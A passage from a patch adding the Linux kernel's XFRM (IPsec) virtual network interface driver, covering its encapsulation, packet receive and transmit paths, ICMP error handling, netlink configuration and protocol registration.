++	if (!new_state) {
++		NL_SET_ERR_MSG(extack, "failed to create encap info");
++		return -ENOMEM;
++	}
++
++	new_state->type = LWTUNNEL_ENCAP_XFRM;
++
++	info = lwt_xfrm_info(new_state);
++
++	info->if_id = nla_get_u32(tb[LWT_XFRM_IF_ID]);
++
++	if (tb[LWT_XFRM_LINK])
++		info->link = nla_get_u32(tb[LWT_XFRM_LINK]);
++
++	*ts = new_state;
++	return 0;
++}
++
++static int xfrmi_fill_encap_info(struct sk_buff *skb,
++				 struct lwtunnel_state *lwt)
++{
++	struct xfrm_md_info *info = lwt_xfrm_info(lwt);
++
++	if (nla_put_u32(skb, LWT_XFRM_IF_ID, info->if_id) ||
++	    (info->link && nla_put_u32(skb, LWT_XFRM_LINK, info->link)))
++		return -EMSGSIZE;
++
++	return 0;
++}
++
++static int xfrmi_encap_nlsize(struct lwtunnel_state *lwtstate)
++{
++	return nla_total_size(sizeof(u32)) + /* LWT_XFRM_IF_ID */
++		nla_total_size(sizeof(u32)); /* LWT_XFRM_LINK */
++}
++
++static int xfrmi_encap_cmp(struct lwtunnel_state *a, struct lwtunnel_state *b)
++{
++	struct xfrm_md_info *a_info = lwt_xfrm_info(a);
++	struct xfrm_md_info *b_info = lwt_xfrm_info(b);
++
++	return memcmp(a_info, b_info, sizeof(*a_info));
++}
++
++static const struct lwtunnel_encap_ops xfrmi_encap_ops = {
++	.build_state	= xfrmi_build_state,
++	.destroy_state	= xfrmi_destroy_state,
++	.fill_encap	= xfrmi_fill_encap_info,
++	.get_encap_size = xfrmi_encap_nlsize,
++	.cmp_encap	= xfrmi_encap_cmp,
++	.owner		= THIS_MODULE,
++};
++
++#define for_each_xfrmi_rcu(start, xi) \
++	for (xi = rcu_dereference(start); xi; xi = rcu_dereference(xi->next))
++
++static u32 xfrmi_hash(u32 if_id)
++{
++	return hash_32(if_id, XFRMI_HASH_BITS);
++}
++
++static struct xfrm_if *xfrmi_lookup(struct net *net, struct xfrm_state *x)
++{
++	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++	struct xfrm_if *xi;
++
++	for_each_xfrmi_rcu(xfrmn->xfrmi[xfrmi_hash(x->if_id)], xi) {
++		if (x->if_id == xi->p.if_id &&
++		    (xi->dev->flags & IFF_UP))
++			return xi;
++	}
++
++	xi = rcu_dereference(xfrmn->collect_md_xfrmi);
++	if (xi && (xi->dev->flags & IFF_UP))
++		return xi;
++
++	return NULL;
++}
++
++static bool xfrmi_decode_session(struct sk_buff *skb,
++				 unsigned short family,
++				 struct xfrm_if_decode_session_result *res)
++{
++	struct net_device *dev;
++	struct xfrm_if *xi;
++	int ifindex = 0;
++
++	if (!secpath_exists(skb) || !skb->dev)
++		return false;
++
++	switch (family) {
++	case AF_INET6:
++		ifindex = inet6_sdif(skb);
++		break;
++	case AF_INET:
++		ifindex = inet_sdif(skb);
++		break;
++	}
++
++	if (ifindex) {
++		struct net *net = xs_net(xfrm_input_state(skb));
++
++		dev = dev_get_by_index_rcu(net, ifindex);
++	} else {
++		dev = skb->dev;
++	}
++
++	if (!dev || !(dev->flags & IFF_UP))
++		return false;
++	if (dev->netdev_ops != &xfrmi_netdev_ops)
++		return false;
++
++	xi = netdev_priv(dev);
++	res->net = xi->net;
++
++	if (xi->p.collect_md)
++		res->if_id = xfrm_input_state(skb)->if_id;
++	else
++		res->if_id = xi->p.if_id;
++	return true;
++}
++
++static void xfrmi_link(struct xfrmi_net *xfrmn, struct xfrm_if *xi)
++{
++	struct xfrm_if __rcu **xip = &xfrmn->xfrmi[xfrmi_hash(xi->p.if_id)];
++
++	rcu_assign_pointer(xi->next , rtnl_dereference(*xip));
++	rcu_assign_pointer(*xip, xi);
++}
++
++static void xfrmi_unlink(struct xfrmi_net *xfrmn, struct xfrm_if *xi)
++{
++	struct xfrm_if __rcu **xip;
++	struct xfrm_if *iter;
++
++	for (xip = &xfrmn->xfrmi[xfrmi_hash(xi->p.if_id)];
++	     (iter = rtnl_dereference(*xip)) != NULL;
++	     xip = &iter->next) {
++		if (xi == iter) {
++			rcu_assign_pointer(*xip, xi->next);
++			break;
++		}
++	}
++}
++
++static void xfrmi_dev_free(struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++
++	gro_cells_destroy(&xi->gro_cells);
++	free_percpu(dev->tstats);
++}
++
++static int xfrmi_create(struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net *net = dev_net(dev);
++	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++	int err;
++
++	dev->rtnl_link_ops = &xfrmi_link_ops;
++	err = register_netdevice(dev);
++	if (err < 0)
++		goto out;
++
++	if (xi->p.collect_md)
++		rcu_assign_pointer(xfrmn->collect_md_xfrmi, xi);
++	else
++		xfrmi_link(xfrmn, xi);
++
++	return 0;
++
++out:
++	return err;
++}
++
++static struct xfrm_if *xfrmi_locate(struct net *net, struct xfrm_if_parms *p)
++{
++	struct xfrm_if __rcu **xip;
++	struct xfrm_if *xi;
++	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++
++	for (xip = &xfrmn->xfrmi[xfrmi_hash(p->if_id)];
++	     (xi = rtnl_dereference(*xip)) != NULL;
++	     xip = &xi->next)
++		if (xi->p.if_id == p->if_id)
++			return xi;
++
++	return NULL;
++}
++
++static void xfrmi_dev_uninit(struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct xfrmi_net *xfrmn = net_generic(xi->net, xfrmi_net_id);
++
++	if (xi->p.collect_md)
++		RCU_INIT_POINTER(xfrmn->collect_md_xfrmi, NULL);
++	else
++		xfrmi_unlink(xfrmn, xi);
++}
++
++static void xfrmi_scrub_packet(struct sk_buff *skb, bool xnet)
++{
++	skb_clear_tstamp(skb);
++	skb->pkt_type = PACKET_HOST;
++	skb->skb_iif = 0;
++	skb->ignore_df = 0;
++	skb_dst_drop(skb);
++	nf_reset_ct(skb);
++	nf_reset_trace(skb);
++
++	if (!xnet)
++		return;
++
++	ipvs_reset(skb);
++	secpath_reset(skb);
++	skb_orphan(skb);
++	skb->mark = 0;
++}
++
++static int xfrmi_input(struct sk_buff *skb, int nexthdr, __be32 spi,
++		       int encap_type, unsigned short family)
++{
++	struct sec_path *sp;
++
++	sp = skb_sec_path(skb);
++	if (sp && (sp->len || sp->olen) &&
++	    !xfrm_policy_check(NULL, XFRM_POLICY_IN, skb, family))
++		goto discard;
++
++	XFRM_SPI_SKB_CB(skb)->family = family;
++	if (family == AF_INET) {
++		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct iphdr, daddr);
++		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip4 = NULL;
++	} else {
++		XFRM_SPI_SKB_CB(skb)->daddroff = offsetof(struct ipv6hdr, daddr);
++		XFRM_TUNNEL_SKB_CB(skb)->tunnel.ip6 = NULL;
++	}
++
++	return xfrm_input(skb, nexthdr, spi, encap_type);
++discard:
++	kfree_skb(skb);
++	return 0;
++}
++
++static int xfrmi4_rcv(struct sk_buff *skb)
++{
++	return xfrmi_input(skb, ip_hdr(skb)->protocol, 0, 0, AF_INET);
++}
++
++static int xfrmi6_rcv(struct sk_buff *skb)
++{
++	return xfrmi_input(skb, skb_network_header(skb)[IP6CB(skb)->nhoff],
++			   0, 0, AF_INET6);
++}
++
++static int xfrmi4_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
++{
++	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET);
++}
++
++static int xfrmi6_input(struct sk_buff *skb, int nexthdr, __be32 spi, int encap_type)
++{
++	return xfrmi_input(skb, nexthdr, spi, encap_type, AF_INET6);
++}
++
++static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
++{
++	const struct xfrm_mode *inner_mode;
++	struct net_device *dev;
++	struct xfrm_state *x;
++	struct xfrm_if *xi;
++	bool xnet;
++	int link;
++
++	if (err && !secpath_exists(skb))
++		return 0;
++
++	x = xfrm_input_state(skb);
++
++	xi = xfrmi_lookup(xs_net(x), x);
++	if (!xi)
++		return 1;
++
++	link = skb->dev->ifindex;
++	dev = xi->dev;
++	skb->dev = dev;
++
++	if (err) {
++		dev->stats.rx_errors++;
++		dev->stats.rx_dropped++;
++
++		return 0;
++	}
++
++	xnet = !net_eq(xi->net, dev_net(skb->dev));
++
++	if (xnet) {
++		inner_mode = &x->inner_mode;
++
++		if (x->sel.family == AF_UNSPEC) {
++			inner_mode = xfrm_ip2inner_mode(x, XFRM_MODE_SKB_CB(skb)->protocol);
++			if (inner_mode == NULL) {
++				XFRM_INC_STATS(dev_net(skb->dev),
++					       LINUX_MIB_XFRMINSTATEMODEERROR);
++				return -EINVAL;
++			}
++		}
++
++		if (!xfrm_policy_check(NULL, XFRM_POLICY_IN, skb,
++				       inner_mode->family))
++			return -EPERM;
++	}
++
++	xfrmi_scrub_packet(skb, xnet);
++	if (xi->p.collect_md) {
++		struct metadata_dst *md_dst;
++
++		md_dst = metadata_dst_alloc(0, METADATA_XFRM, GFP_ATOMIC);
++		if (!md_dst)
++			return -ENOMEM;
++
++		md_dst->u.xfrm_info.if_id = x->if_id;
++		md_dst->u.xfrm_info.link = link;
++		skb_dst_set(skb, (struct dst_entry *)md_dst);
++	}
++	dev_sw_netstats_rx_add(dev, skb->len);
++
++	return 0;
++}
++
++static int
++xfrmi_xmit2(struct sk_buff *skb, struct net_device *dev, struct flowi *fl)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net_device_stats *stats = &xi->dev->stats;
++	struct dst_entry *dst = skb_dst(skb);
++	unsigned int length = skb->len;
++	struct net_device *tdev;
++	struct xfrm_state *x;
++	int err = -1;
++	u32 if_id;
++	int mtu;
++
++	if (xi->p.collect_md) {
++		struct xfrm_md_info *md_info = skb_xfrm_md_info(skb);
++
++		if (unlikely(!md_info))
++			return -EINVAL;
++
++		if_id = md_info->if_id;
++		fl->flowi_oif = md_info->link;
++	} else {
++		if_id = xi->p.if_id;
++	}
++
++	dst_hold(dst);
++	dst = xfrm_lookup_with_ifid(xi->net, dst, fl, NULL, 0, if_id);
++	if (IS_ERR(dst)) {
++		err = PTR_ERR(dst);
++		dst = NULL;
++		goto tx_err_link_failure;
++	}
++
++	x = dst->xfrm;
++	if (!x)
++		goto tx_err_link_failure;
++
++	if (x->if_id != if_id)
++		goto tx_err_link_failure;
++
++	tdev = dst->dev;
++
++	if (tdev == dev) {
++		stats->collisions++;
++		net_warn_ratelimited("%s: Local routing loop detected!\n",
++				     dev->name);
++		goto tx_err_dst_release;
++	}
++
++	mtu = dst_mtu(dst);
++	if ((!skb_is_gso(skb) && skb->len > mtu) ||
++	    (skb_is_gso(skb) && !skb_gso_validate_network_len(skb, mtu))) {
++		skb_dst_update_pmtu_no_confirm(skb, mtu);
++
++		if (skb->protocol == htons(ETH_P_IPV6)) {
++			if (mtu < IPV6_MIN_MTU)
++				mtu = IPV6_MIN_MTU;
++
++			if (skb->len > 1280)
++				icmpv6_ndo_send(skb, ICMPV6_PKT_TOOBIG, 0, mtu);
++			else
++				goto xmit;
++		} else {
++			if (!(ip_hdr(skb)->frag_off & htons(IP_DF)))
++				goto xmit;
++			icmp_ndo_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED,
++				      htonl(mtu));
++		}
++
++		dst_release(dst);
++		return -EMSGSIZE;
++	}
++
++xmit:
++	xfrmi_scrub_packet(skb, !net_eq(xi->net, dev_net(dev)));
++	skb_dst_set(skb, dst);
++	skb->dev = tdev;
++
++	err = dst_output(xi->net, skb->sk, skb);
++	if (net_xmit_eval(err) == 0) {
++		dev_sw_netstats_tx_add(dev, 1, length);
++	} else {
++		stats->tx_errors++;
++		stats->tx_aborted_errors++;
++	}
++
++	return 0;
++tx_err_link_failure:
++	stats->tx_carrier_errors++;
++	dst_link_failure(skb);
++tx_err_dst_release:
++	dst_release(dst);
++	return err;
++}
++
++static netdev_tx_t xfrmi_xmit(struct sk_buff *skb, struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net_device_stats *stats = &xi->dev->stats;
++	struct dst_entry *dst = skb_dst(skb);
++	struct flowi fl;
++	int ret;
++
++	memset(&fl, 0, sizeof(fl));
++
++	switch (skb->protocol) {
++	case htons(ETH_P_IPV6):
++		xfrm_decode_session(skb, &fl, AF_INET6);
++		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++		if (!dst) {
++			fl.u.ip6.flowi6_oif = dev->ifindex;
++			fl.u.ip6.flowi6_flags |= FLOWI_FLAG_ANYSRC;
++			dst = ip6_route_output(dev_net(dev), NULL, &fl.u.ip6);
++			if (dst->error) {
++				dst_release(dst);
++				stats->tx_carrier_errors++;
++				goto tx_err;
++			}
++			skb_dst_set(skb, dst);
++		}
++		break;
++	case htons(ETH_P_IP):
++		xfrm_decode_session(skb, &fl, AF_INET);
++		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++		if (!dst) {
++			struct rtable *rt;
++
++			fl.u.ip4.flowi4_oif = dev->ifindex;
++			fl.u.ip4.flowi4_flags |= FLOWI_FLAG_ANYSRC;
++			rt = __ip_route_output_key(dev_net(dev), &fl.u.ip4);
++			if (IS_ERR(rt)) {
++				stats->tx_carrier_errors++;
++				goto tx_err;
++			}
++			skb_dst_set(skb, &rt->dst);
++		}
++		break;
++	default:
++		goto tx_err;
++	}
++
++	fl.flowi_oif = xi->p.link;
++
++	ret = xfrmi_xmit2(skb, dev, &fl);
++	if (ret < 0)
++		goto tx_err;
++
++	return NETDEV_TX_OK;
++
++tx_err:
++	stats->tx_errors++;
++	stats->tx_dropped++;
++	kfree_skb(skb);
++	return NETDEV_TX_OK;
++}
++
++static int xfrmi4_err(struct sk_buff *skb, u32 info)
++{
++	const struct iphdr *iph = (const struct iphdr *)skb->data;
++	struct net *net = dev_net(skb->dev);
++	int protocol = iph->protocol;
++	struct ip_comp_hdr *ipch;
++	struct ip_esp_hdr *esph;
++	struct ip_auth_hdr *ah ;
++	struct xfrm_state *x;
++	struct xfrm_if *xi;
++	__be32 spi;
++
++	switch (protocol) {
++	case IPPROTO_ESP:
++		esph = (struct ip_esp_hdr *)(skb->data+(iph->ihl<<2));
++		spi = esph->spi;
++		break;
++	case IPPROTO_AH:
++		ah = (struct ip_auth_hdr *)(skb->data+(iph->ihl<<2));
++		spi = ah->spi;
++		break;
++	case IPPROTO_COMP:
++		ipch = (struct ip_comp_hdr *)(skb->data+(iph->ihl<<2));
++		spi = htonl(ntohs(ipch->cpi));
++		break;
++	default:
++		return 0;
++	}
++
++	switch (icmp_hdr(skb)->type) {
++	case ICMP_DEST_UNREACH:
++		if (icmp_hdr(skb)->code != ICMP_FRAG_NEEDED)
++			return 0;
++		break;
++	case ICMP_REDIRECT:
++		break;
++	default:
++		return 0;
++	}
++
++	x = xfrm_state_lookup(net, skb->mark, (const xfrm_address_t *)&iph->daddr,
++			      spi, protocol, AF_INET);
++	if (!x)
++		return 0;
++
++	xi = xfrmi_lookup(net, x);
++	if (!xi) {
++		xfrm_state_put(x);
++		return -1;
++	}
++
++	if (icmp_hdr(skb)->type == ICMP_DEST_UNREACH)
++		ipv4_update_pmtu(skb, net, info, 0, protocol);
++	else
++		ipv4_redirect(skb, net, 0, protocol);
++	xfrm_state_put(x);
++
++	return 0;
++}
++
++static int xfrmi6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
++		    u8 type, u8 code, int offset, __be32 info)
++{
++	const struct ipv6hdr *iph = (const struct ipv6hdr *)skb->data;
++	struct net *net = dev_net(skb->dev);
++	int protocol = iph->nexthdr;
++	struct ip_comp_hdr *ipch;
++	struct ip_esp_hdr *esph;
++	struct ip_auth_hdr *ah;
++	struct xfrm_state *x;
++	struct xfrm_if *xi;
++	__be32 spi;
++
++	switch (protocol) {
++	case IPPROTO_ESP:
++		esph = (struct ip_esp_hdr *)(skb->data + offset);
++		spi = esph->spi;
++		break;
++	case IPPROTO_AH:
++		ah = (struct ip_auth_hdr *)(skb->data + offset);
++		spi = ah->spi;
++		break;
++	case IPPROTO_COMP:
++		ipch = (struct ip_comp_hdr *)(skb->data + offset);
++		spi = htonl(ntohs(ipch->cpi));
++		break;
++	default:
++		return 0;
++	}
++
++	if (type != ICMPV6_PKT_TOOBIG &&
++	    type != NDISC_REDIRECT)
++		return 0;
++
++	x = xfrm_state_lookup(net, skb->mark, (const xfrm_address_t *)&iph->daddr,
++			      spi, protocol, AF_INET6);
++	if (!x)
++		return 0;
++
++	xi = xfrmi_lookup(net, x);
++	if (!xi) {
++		xfrm_state_put(x);
++		return -1;
++	}
++
++	if (type == NDISC_REDIRECT)
++		ip6_redirect(skb, net, skb->dev->ifindex, 0,
++			     sock_net_uid(net, NULL));
++	else
++		ip6_update_pmtu(skb, net, info, 0, 0, sock_net_uid(net, NULL));
++	xfrm_state_put(x);
++
++	return 0;
++}
++
++static int xfrmi_change(struct xfrm_if *xi, const struct xfrm_if_parms *p)
++{
++	if (xi->p.link != p->link)
++		return -EINVAL;
++
++	xi->p.if_id = p->if_id;
++
++	return 0;
++}
++
++static int xfrmi_update(struct xfrm_if *xi, struct xfrm_if_parms *p)
++{
++	struct net *net = xi->net;
++	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++	int err;
++
++	xfrmi_unlink(xfrmn, xi);
++	synchronize_net();
++	err = xfrmi_change(xi, p);
++	xfrmi_link(xfrmn, xi);
++	netdev_state_change(xi->dev);
++	return err;
++}
++
++static int xfrmi_get_iflink(const struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++
++	return xi->p.link;
++}
++
++static const struct net_device_ops xfrmi_netdev_ops = {
++	.ndo_init	= xfrmi_dev_init,
++	.ndo_uninit	= xfrmi_dev_uninit,
++	.ndo_start_xmit = xfrmi_xmit,
++	.ndo_get_stats64 = dev_get_tstats64,
++	.ndo_get_iflink = xfrmi_get_iflink,
++};
++
++static void xfrmi_dev_setup(struct net_device *dev)
++{
++	dev->netdev_ops 	= &xfrmi_netdev_ops;
++	dev->header_ops		= &ip_tunnel_header_ops;
++	dev->type		= ARPHRD_NONE;
++	dev->mtu		= ETH_DATA_LEN;
++	dev->min_mtu		= ETH_MIN_MTU;
++	dev->max_mtu		= IP_MAX_MTU;
++	dev->flags 		= IFF_NOARP;
++	dev->needs_free_netdev	= true;
++	dev->priv_destructor	= xfrmi_dev_free;
++	netif_keep_dst(dev);
++
++	eth_broadcast_addr(dev->broadcast);
++}
++
++#define XFRMI_FEATURES (NETIF_F_SG |		\
++			NETIF_F_FRAGLIST |	\
++			NETIF_F_GSO_SOFTWARE |	\
++			NETIF_F_HW_CSUM)
++
++static int xfrmi_dev_init(struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net_device *phydev = __dev_get_by_index(xi->net, xi->p.link);
++	int err;
++
++	dev->tstats = netdev_alloc_pcpu_stats(struct pcpu_sw_netstats);
++	if (!dev->tstats)
++		return -ENOMEM;
++
++	err = gro_cells_init(&xi->gro_cells, dev);
++	if (err) {
++		free_percpu(dev->tstats);
++		return err;
++	}
++
++	dev->features |= NETIF_F_LLTX;
++	dev->features |= XFRMI_FEATURES;
++	dev->hw_features |= XFRMI_FEATURES;
++
++	if (phydev) {
++		dev->needed_headroom = phydev->needed_headroom;
++		dev->needed_tailroom = phydev->needed_tailroom;
++
++		if (is_zero_ether_addr(dev->dev_addr))
++			eth_hw_addr_inherit(dev, phydev);
++		if (is_zero_ether_addr(dev->broadcast))
++			memcpy(dev->broadcast, phydev->broadcast,
++			       dev->addr_len);
++	} else {
++		eth_hw_addr_random(dev);
++		eth_broadcast_addr(dev->broadcast);
++	}
++
++	return 0;
++}
++
++static int xfrmi_validate(struct nlattr *tb[], struct nlattr *data[],
++			 struct netlink_ext_ack *extack)
++{
++	return 0;
++}
++
++static void xfrmi_netlink_parms(struct nlattr *data[],
++			       struct xfrm_if_parms *parms)
++{
++	memset(parms, 0, sizeof(*parms));
++
++	if (!data)
++		return;
++
++	if (data[IFLA_XFRM_LINK])
++		parms->link = nla_get_u32(data[IFLA_XFRM_LINK]);
++
++	if (data[IFLA_XFRM_IF_ID])
++		parms->if_id = nla_get_u32(data[IFLA_XFRM_IF_ID]);
++
++	if (data[IFLA_XFRM_COLLECT_METADATA])
++		parms->collect_md = true;
++}
++
++static int xfrmi_newlink(struct net *src_net, struct net_device *dev,
++			struct nlattr *tb[], struct nlattr *data[],
++			struct netlink_ext_ack *extack)
++{
++	struct net *net = dev_net(dev);
++	struct xfrm_if_parms p = {};
++	struct xfrm_if *xi;
++	int err;
++
++	xfrmi_netlink_parms(data, &p);
++	if (p.collect_md) {
++		struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++
++		if (p.link || p.if_id) {
++			NL_SET_ERR_MSG(extack, "link and if_id must be zero");
++			return -EINVAL;
++		}
++
++		if (rtnl_dereference(xfrmn->collect_md_xfrmi))
++			return -EEXIST;
++
++	} else {
++		if (!p.if_id) {
++			NL_SET_ERR_MSG(extack, "if_id must be non zero");
++			return -EINVAL;
++		}
++
++		xi = xfrmi_locate(net, &p);
++		if (xi)
++			return -EEXIST;
++	}
++
++	xi = netdev_priv(dev);
++	xi->p = p;
++	xi->net = net;
++	xi->dev = dev;
++
++	err = xfrmi_create(dev);
++	return err;
++}
++
++static void xfrmi_dellink(struct net_device *dev, struct list_head *head)
++{
++	unregister_netdevice_queue(dev, head);
++}
++
++static int xfrmi_changelink(struct net_device *dev, struct nlattr *tb[],
++			   struct nlattr *data[],
++			   struct netlink_ext_ack *extack)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct net *net = xi->net;
++	struct xfrm_if_parms p = {};
++
++	xfrmi_netlink_parms(data, &p);
++	if (!p.if_id) {
++		NL_SET_ERR_MSG(extack, "if_id must be non zero");
++		return -EINVAL;
++	}
++
++	if (p.collect_md) {
++		NL_SET_ERR_MSG(extack, "collect_md can't be changed");
++		return -EINVAL;
++	}
++
++	xi = xfrmi_locate(net, &p);
++	if (!xi) {
++		xi = netdev_priv(dev);
++	} else {
++		if (xi->dev != dev)
++			return -EEXIST;
++		if (xi->p.collect_md) {
++			NL_SET_ERR_MSG(extack,
++				       "device can't be changed to collect_md");
++			return -EINVAL;
++		}
++	}
++
++	return xfrmi_update(xi, &p);
++}
++
++static size_t xfrmi_get_size(const struct net_device *dev)
++{
++	return
++		/* IFLA_XFRM_LINK */
++		nla_total_size(4) +
++		/* IFLA_XFRM_IF_ID */
++		nla_total_size(4) +
++		/* IFLA_XFRM_COLLECT_METADATA */
++		nla_total_size(0) +
++		0;
++}
++
++static int xfrmi_fill_info(struct sk_buff *skb, const struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++	struct xfrm_if_parms *parm = &xi->p;
++
++	if (nla_put_u32(skb, IFLA_XFRM_LINK, parm->link) ||
++	    nla_put_u32(skb, IFLA_XFRM_IF_ID, parm->if_id) ||
++	    (xi->p.collect_md && nla_put_flag(skb, IFLA_XFRM_COLLECT_METADATA)))
++		goto nla_put_failure;
++	return 0;
++
++nla_put_failure:
++	return -EMSGSIZE;
++}
++
++static struct net *xfrmi_get_link_net(const struct net_device *dev)
++{
++	struct xfrm_if *xi = netdev_priv(dev);
++
++	return xi->net;
++}
++
++static const struct nla_policy xfrmi_policy[IFLA_XFRM_MAX + 1] = {
++	[IFLA_XFRM_UNSPEC]		= { .strict_start_type = IFLA_XFRM_COLLECT_METADATA },
++	[IFLA_XFRM_LINK]		= { .type = NLA_U32 },
++	[IFLA_XFRM_IF_ID]		= { .type = NLA_U32 },
++	[IFLA_XFRM_COLLECT_METADATA]	= { .type = NLA_FLAG },
++};
++
++static struct rtnl_link_ops xfrmi_link_ops __read_mostly = {
++	.kind		= "xfrm",
++	.maxtype	= IFLA_XFRM_MAX,
++	.policy		= xfrmi_policy,
++	.priv_size	= sizeof(struct xfrm_if),
++	.setup		= xfrmi_dev_setup,
++	.validate	= xfrmi_validate,
++	.newlink	= xfrmi_newlink,
++	.dellink	= xfrmi_dellink,
++	.changelink	= xfrmi_changelink,
++	.get_size	= xfrmi_get_size,
++	.fill_info	= xfrmi_fill_info,
++	.get_link_net	= xfrmi_get_link_net,
++};
++
++static void __net_exit xfrmi_exit_batch_net(struct list_head *net_exit_list)
++{
++	struct net *net;
++	LIST_HEAD(list);
++
++	rtnl_lock();
++	list_for_each_entry(net, net_exit_list, exit_list) {
++		struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
++		struct xfrm_if __rcu **xip;
++		struct xfrm_if *xi;
++		int i;
++
++		for (i = 0; i < XFRMI_HASH_SIZE; i++) {
++			for (xip = &xfrmn->xfrmi[i];
++			     (xi = rtnl_dereference(*xip)) != NULL;
++			     xip = &xi->next)
++				unregister_netdevice_queue(xi->dev, &list);
++		}
++		xi = rtnl_dereference(xfrmn->collect_md_xfrmi);
++		if (xi)
++			unregister_netdevice_queue(xi->dev, &list);
++	}
++	unregister_netdevice_many(&list);
++	rtnl_unlock();
++}
++
++static struct pernet_operations xfrmi_net_ops = {
++	.exit_batch = xfrmi_exit_batch_net,
++	.id   = &xfrmi_net_id,
++	.size = sizeof(struct xfrmi_net),
++};
++
++static struct xfrm6_protocol xfrmi_esp6_protocol __read_mostly = {
++	.handler	=	xfrmi6_rcv,
++	.input_handler	=	xfrmi6_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	10,
++};
++
++static struct xfrm6_protocol xfrmi_ah6_protocol __read_mostly = {
++	.handler	=	xfrm6_rcv,
++	.input_handler	=	xfrm_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	10,
++};
++
++static struct xfrm6_protocol xfrmi_ipcomp6_protocol __read_mostly = {
++	.handler	=	xfrm6_rcv,
++	.input_handler	=	xfrm_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	10,
++};
++
++#if IS_REACHABLE(CONFIG_INET6_XFRM_TUNNEL)
++static int xfrmi6_rcv_tunnel(struct sk_buff *skb)
++{
++	const xfrm_address_t *saddr;
++	__be32 spi;
++
++	saddr = (const xfrm_address_t *)&ipv6_hdr(skb)->saddr;
++	spi = xfrm6_tunnel_spi_lookup(dev_net(skb->dev), saddr);
++
++	return xfrm6_rcv_spi(skb, IPPROTO_IPV6, spi, NULL);
++}
++
++static struct xfrm6_tunnel xfrmi_ipv6_handler __read_mostly = {
++	.handler	=	xfrmi6_rcv_tunnel,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	2,
++};
++
++static struct xfrm6_tunnel xfrmi_ip6ip_handler __read_mostly = {
++	.handler	=	xfrmi6_rcv_tunnel,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi6_err,
++	.priority	=	2,
++};
++#endif
++
++static struct xfrm4_protocol xfrmi_esp4_protocol __read_mostly = {
++	.handler	=	xfrmi4_rcv,
++	.input_handler	=	xfrmi4_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	10,
++};
++
++static struct xfrm4_protocol xfrmi_ah4_protocol __read_mostly = {
++	.handler	=	xfrm4_rcv,
++	.input_handler	=	xfrm_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	10,
++};
++
++static struct xfrm4_protocol xfrmi_ipcomp4_protocol __read_mostly = {
++	.handler	=	xfrm4_rcv,
++	.input_handler	=	xfrm_input,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	10,
++};
++
++#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
++static int xfrmi4_rcv_tunnel(struct sk_buff *skb)
++{
++	return xfrm4_rcv_spi(skb, IPPROTO_IPIP, ip_hdr(skb)->saddr);
++}
++
++static struct xfrm_tunnel xfrmi_ipip_handler __read_mostly = {
++	.handler	=	xfrmi4_rcv_tunnel,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	3,
++};
++
++static struct xfrm_tunnel xfrmi_ipip6_handler __read_mostly = {
++	.handler	=	xfrmi4_rcv_tunnel,
++	.cb_handler	=	xfrmi_rcv_cb,
++	.err_handler	=	xfrmi4_err,
++	.priority	=	2,
++};
++#endif
++
++static int __init xfrmi4_init(void)
++{
++	int err;
++
++	err = xfrm4_protocol_register(&xfrmi_esp4_protocol, IPPROTO_ESP);
++	if (err < 0)
++		goto xfrm_proto_esp_failed;
++	err = xfrm4_protocol_register(&xfrmi_ah4_protocol, IPPROTO_AH);
++	if (err < 0)
++		goto xfrm_proto_ah_failed;
++	err = xfrm4_protocol_register(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
++	if (err < 0)
++		goto xfrm_proto_comp_failed;
++#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
++	err = xfrm4_tunnel_register(&xfrmi_ipip_handler, AF_INET);
++	if (err < 0)
++		goto xfrm_tunnel_ipip_failed;
++	err = xfrm4_tunnel_register(&xfrmi_ipip6_handler, AF_INET6);
++	if (err < 0)
++		goto xfrm_tunnel_ipip6_failed;
++#endif
++
++	return 0;
++
++#if IS_REACHABLE(CONFIG_INET_XFRM_TUNNEL)
++xfrm_tunnel_ipip6_failed:
++	xfrm4_tunnel_deregister(&xfrmi_ipip_handler, AF_INET);
++xfrm_tunnel_ipip_failed:
++	xfrm4_protocol_deregister(&xfrmi_ipcomp4_protocol, IPPROTO_COMP);
++#endif
++xfrm_proto_comp_failed:
